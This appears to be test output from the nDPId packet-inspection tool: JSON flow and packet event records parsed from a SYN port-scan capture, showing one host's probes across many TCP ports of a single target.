-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1506,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1496,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsYAYAAC0Gu2ysEAAIQA2GNIzSB9LdUoMYAAAAAGACCAAovQAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1507,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":340,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1507,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1497,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ0cAACsGtiusEAAIQA2GNIzSAVTdUoMYAAAAAGACEAAnOwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1508,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7435,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1508,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1498,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsgsYAADsGiqysEAAIQA2GNIzSHQvdUoMYAAAAAGACEAALhAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1509,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1509,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1499,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsnEMAACsGgS+sEAAIQA2GNIzSGojdUoMYAAAAAGACEAAOBwAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1510,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1510,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1500,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsYIUAAC0Guu2sEAAIQA2GNIzSAw\/dUoMYAAAAAGACCAAtgAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1511,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1147,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1511,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1501,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAs5r4AAC4GM7SsEAAIQA2GNIzSBHvdUoMYAAAAAGACDAAoFAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1512,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060701,"flow_last_seen":1278275060701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060701,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1512,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1502,"flow_packet_id":1,"flow_last_seen":1278275060701,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060701,"pkt":"ACYLMQczACWzv5HuCABFAAAsVaQAADQGvs6sEAAIQA2GNIzS0x3dUoMYAAAAAGACBABhcQAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1513,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060743,"flow_last_seen":1278275060743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1513,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1503,"flow_packet_id":1,"flow_last_seen":1278275060743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060743,"pkt":"ACYLMQczACWzv5HuCABFAAAs3tQAACgGQZ6sEAAIQA2GNIzTwBfdU4MZAAAAAGACBAB0dAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1514,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1514,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1504,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsp9QAACoGdp6sEAAIQA2GNIzTH5HdU4MZAAAAAGACDAAM+wAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1515,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1515,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1505,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAssgkAAC4GaGmsEAAIQA2GNIzTzcHdU4MZAAAAAGACDABeygAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1516,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1516,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1506,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsOvEAACYG54GsEAAIQA2GNIzTG1zdU4MZAAAAAGACDAARMAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1517,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1517,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1507,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsZzcAACwGtTusEAAIQA2GNIzTatjdU4MZAAAAAGACBADJswAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1518,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1518,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1508,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAs9\/IAADoGFoCsEAAIQA2GNIzTHRPdU4MZAAAAAGACDAAPeQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1519,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1519,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1509,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsc2kAAC4GpwmsEAAIQA2GNIzTE4zdU4MZAAAAAGACDAAZAAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1520,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1520,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1510,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsV7wAADIGvrasEAAIQA2GNIzTCpbdU4MZAAAAAGACDAAh9gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1521,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2492,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1521,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1511,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAs1zgAADUGPDqsEAAIQA2GNIzTCbzdU4MZAAAAAGACCAAm0AAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1522,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1522,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1512,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsUiMAADkGvU+sEAAIQA2GNIzTA+jdU4MZAAAAAGACCAAspAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1523,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1523,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1513,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/fMAADAGGn+sEAAIQA2GNIzTDMXdU4MZAAAAAGACBAAnxwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1524,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1524,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1514,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAskBMAACkGj1+sEAAIQA2GNIzTB9fdU4MZAAAAAGACCAAotQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1525,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6565,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1525,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1515,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsfuEAADkGkJGsEAAIQA2GNIzTGaXdU4MZAAAAAGACCAAW5wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1526,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3889,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1526,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1516,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/zgAACwGHTqsEAAIQA2GNIzTDzHdU4MZAAAAAGACBAAlWwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1527,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1527,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1517,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsSNkAADcGyJmsEAAIQA2GNIzSBFndUoMYAAAAAGACEAAkNgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1528,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3986,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1528,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1518,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsMkkAACkG7SmsEAAIQA2GNIzSD5LdUoMYAAAAAGACCAAg\/QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1529,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1529,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1519,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsmhQAACcGh16sEAAIQA2GNIzSIPvdUoMYAAAAAGACEAAHlAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1530,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1530,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1520,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsTp0AACcG0tWsEAAIQA2GNIzSBB7dUoMYAAAAAGACEAAkcQAAAgQFtA=="} 
